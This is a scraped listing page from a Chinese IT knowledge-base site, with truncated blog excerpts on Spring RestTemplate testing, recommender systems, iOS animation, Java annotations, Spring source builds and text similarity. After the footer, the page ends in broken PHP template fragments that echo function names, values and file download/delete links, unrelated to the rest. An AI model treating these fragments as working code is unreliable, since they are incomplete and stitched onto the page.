                                    上一篇《Spring MVC测试框架详解——服务端测试》已经介绍了服务端测试，接下来再看看如果测试Rest客户端，对于客户端测试以前经常使用的方法是启动一个内嵌的jetty/tomcat容器，然后发送真实的请求到相应的控制器；这种方式的缺点就是速度慢；自Spring 3.2开始提供了对RestTemplate的模拟服务器测试方式，也就是说使用RestTemplate测试时无须启动服务器，而是模拟一
                                
                                关于推荐个人观点
                                    liyonghui160com
推荐系统关于推荐个人观点
                                        回想起来，我也做推荐了3年多了，最近公司做了调整招聘了很多算法工程师，以为需要多么高大上的算法才能搭建起来的，从实践中走过来，我只想说【不是这样的】 
 
    第一次接触推荐系统是在四年前入职的时候，那时候，机器学习和大数据都是没有的概念，什么大数据处理开源软件根本不存在，我们用多台计算机web程序记录用户行为，用.net的w
                                
                                不间断旋转的动画
                                    pangyulei
动画
                                    
CABasicAnimation* rotationAnimation;
    rotationAnimation = [CABasicAnimation animationWithKeyPath:@"transform.rotation.z"];
    rotationAnimation.toValue = [NSNumber numberWithFloat: M
                                
                                自定义annotation
                                    sha1064616837
javaenumannotationreflect
                                    对象有的属性在页面上可编辑，有的属性在页面只可读，以前都是我们在页面上写死的，时间一久有时候会混乱，此处通过自定义annotation在类属性中定义。越来越发现Java的Annotation真心很强大，可以帮我们省去很多代码，让代码看上去简洁。 
下面这个例子 主要用到了 
1.自定义annotation：@interface，以及几个配合着自定义注解使用的几个注解 
2.简单的反射 
3.枚举 
                                
                                Spring 源码
                                    up2pu
spring
                                    1.Spring源代码 
https://github.com/SpringSource/spring-framework/branches/3.2.x 
注：兼容svn检出 
 
2.运行脚本 
import-into-eclipse.bat 
注：需要设置JAVA_HOME为jdk 1.7 
 
build.gradle 
 compileJava { 
 sourceCompatibilit
                                
                                利用word分词来计算文本相似度
                                    yangshangchuan
wordword分词文本相似度余弦相似度简单共有词
                                    word分词提供了多种文本相似度计算方式： 
方式一：余弦相似度，通过计算两个向量的夹角余弦值来评估他们的相似度 
实现类：org.apdplat.word.analysis.CosineTextSimilarity 
用法如下： 
String text1 = "我爱购物";
String text2 = "我爱读书";
String text3 = 
                                
                
            
        
    

    
        
            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    

    
        
            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.

        
    

          
            
              ' . htmlentities($func) . '
        
          Opt
          

              
              
                  
                  ' . htmlentities($value) . '
            
              . htmlentities($filename) . '">下载 / 删除